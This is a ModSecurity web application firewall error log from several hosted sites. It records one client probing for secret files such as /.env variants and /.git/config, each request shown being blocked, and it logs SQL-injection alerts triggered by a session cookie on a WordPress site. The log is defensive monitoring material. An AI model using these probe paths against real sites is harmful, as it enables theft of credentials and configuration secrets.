[Mon May 11 22:30:03.663048 2026] [security2:error] [pid 1588898:tid 1588914] [client 85.121.126.250:36314] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.test"] [unique_id "agI8S6FW67LJTsgN3jQNSwAAAA8"]
[Mon May 11 22:30:03.665361 2026] [security2:error] [pid 1590352:tid 1590406] [client 85.121.126.250:36310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.staging"] [unique_id "agI8S61q0G_aXAqWauT8YgAAAI4"]
[Mon May 11 22:30:03.665452 2026] [security2:error] [pid 1606352:tid 1606423] [client 85.121.126.250:36322] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agI8S3o_DFxNSZVmaX3SUwAAAMQ"]
[Mon May 11 22:30:03.665611 2026] [security2:error] [pid 1590352:tid 1590406] [client 85.121.126.250:36310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.staging"] [unique_id "agI8S61q0G_aXAqWauT8YgAAAI4"]
[Mon May 11 22:30:03.665709 2026] [security2:error] [pid 1606352:tid 1606423] [client 85.121.126.250:36322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agI8S3o_DFxNSZVmaX3SUwAAAMQ"]
[Mon May 11 22:30:03.666071 2026] [security2:error] [pid 1588898:tid 1588914] [client 85.121.126.250:36314] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.test"] [unique_id "agI8S6FW67LJTsgN3jQNSwAAAA8"]
[Mon May 11 22:30:03.672806 2026] [security2:error] [pid 1590352:tid 1590392] [client 85.121.126.250:36258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.example"] [unique_id "agI8S61q0G_aXAqWauT8YQAAAIA"]
[Mon May 11 22:30:03.673608 2026] [security2:error] [pid 1605480:tid 1605541] [client 85.121.126.250:36230] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agI8Sx2Cvzd_nyNfUm8AUAAAARM"]
[Mon May 11 22:30:03.673818 2026] [security2:error] [pid 1605480:tid 1605541] [client 85.121.126.250:36230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agI8Sx2Cvzd_nyNfUm8AUAAAARM"]
[Mon May 11 22:30:03.673941 2026] [security2:error] [pid 1605480:tid 1605525] [client 85.121.126.250:36300] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.backup"] [unique_id "agI8Sx2Cvzd_nyNfUm8ATgAAAQM"]
[Mon May 11 22:30:03.699090 2026] [security2:error] [pid 1590352:tid 1590403] [client 85.121.126.250:36256] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agI8S61q0G_aXAqWauT8YwAAAIs"]
[Mon May 11 22:30:03.699377 2026] [security2:error] [pid 1590352:tid 1590403] [client 85.121.126.250:36256] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agI8S61q0G_aXAqWauT8YwAAAIs"]
[Mon May 11 22:30:03.705418 2026] [security2:error] [pid 1605480:tid 1605525] [client 85.121.126.250:36300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.backup"] [unique_id "agI8Sx2Cvzd_nyNfUm8ATgAAAQM"]
[Mon May 11 22:30:03.701149 2026] [security2:error] [pid 1605480:tid 1605536] [client 85.121.126.250:36306] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.old"] [unique_id "agI8Sx2Cvzd_nyNfUm8ATAAAAQ4"]
[Mon May 11 22:30:03.719460 2026] [security2:error] [pid 1605480:tid 1605536] [client 85.121.126.250:36306] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.old"] [unique_id "agI8Sx2Cvzd_nyNfUm8ATAAAAQ4"]
[Mon May 11 22:30:03.731408 2026] [security2:error] [pid 1605480:tid 1605539] [client 85.121.126.250:36334] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/public/.env"] [unique_id "agI8Sx2Cvzd_nyNfUm8AUQAAARE"]
[Mon May 11 22:30:03.731650 2026] [security2:error] [pid 1605480:tid 1605539] [client 85.121.126.250:36334] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/public/.env"] [unique_id "agI8Sx2Cvzd_nyNfUm8AUQAAARE"]
[Mon May 11 22:30:04.152464 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8TKFW67LJTsgN3jQNTQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:04.152749 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8TKFW67LJTsgN3jQNTQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:08.029810 2026] [security2:error] [pid 1588898:tid 1588917] [client 119.28.140.106:48374] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "bender.piregwan-genesis.com"] [uri "/"] [unique_id "agI8T6FW67LJTsgN3jQNVAAAABI"], referer: http://bender.piregwan-genesis.com
[Mon May 11 22:30:15.324387 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8TKFW67LJTsgN3jQNTQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:17.329963 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8WR2Cvzd_nyNfUm8AWwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:17.330318 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8WR2Cvzd_nyNfUm8AWwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:23.641235 2026] [security2:error] [pid 1601130:tid 1601151] [client 85.121.126.250:36262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S3EgAO_835W6c1mXLQAAAEE"]
[Mon May 11 22:30:24.239525 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8WR2Cvzd_nyNfUm8AWwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:24.305301 2026] [security2:error] [pid 1588898:tid 1588904] [client 85.121.126.250:36264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S6FW67LJTsgN3jQNSAAAAAU"]
[Mon May 11 22:30:24.328389 2026] [security2:error] [pid 1590352:tid 1590406] [client 85.121.126.250:36310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S61q0G_aXAqWauT8YgAAAI4"]
[Mon May 11 22:30:25.140221 2026] [security2:error] [pid 1606352:tid 1606420] [client 85.121.126.250:36326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S3o_DFxNSZVmaX3SUAAAAME"]
[Mon May 11 22:30:26.225444 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8Yh2Cvzd_nyNfUm8AYwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:26.225740 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8Yh2Cvzd_nyNfUm8AYwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:29.693229 2026] [security2:error] [pid 1588898:tid 1588900] [client 85.121.126.250:36260] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S6FW67LJTsgN3jQNSgAAAAA"]
[Mon May 11 22:30:30.812234 2026] [security2:error] [pid 1534836:tid 1534885] [client 85.121.126.250:36240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S9eaRXe5lR8y0ZO2IwAAAU4"]
[Mon May 11 22:30:30.927227 2026] [security2:error] [pid 1588898:tid 1588909] [client 85.121.126.250:36324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S6FW67LJTsgN3jQNSQAAAAo"]
[Mon May 11 22:30:32.424652 2026] [security2:error] [pid 1590352:tid 1590392] [client 85.121.126.250:36258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S61q0G_aXAqWauT8YQAAAIA"]
[Mon May 11 22:30:32.995989 2026] [security2:error] [pid 1605480:tid 1605536] [client 85.121.126.250:36306] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8Sx2Cvzd_nyNfUm8ATAAAAQ4"]
[Mon May 11 22:30:34.127226 2026] [security2:error] [pid 1605480:tid 1605525] [client 85.121.126.250:36300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8Sx2Cvzd_nyNfUm8ATgAAAQM"]
[Mon May 11 22:30:34.249040 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Yh2Cvzd_nyNfUm8AYwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:34.701483 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8ah2Cvzd_nyNfUm8AbwAAAQg"], referer: https://rentparadise.fr/wp-login.php
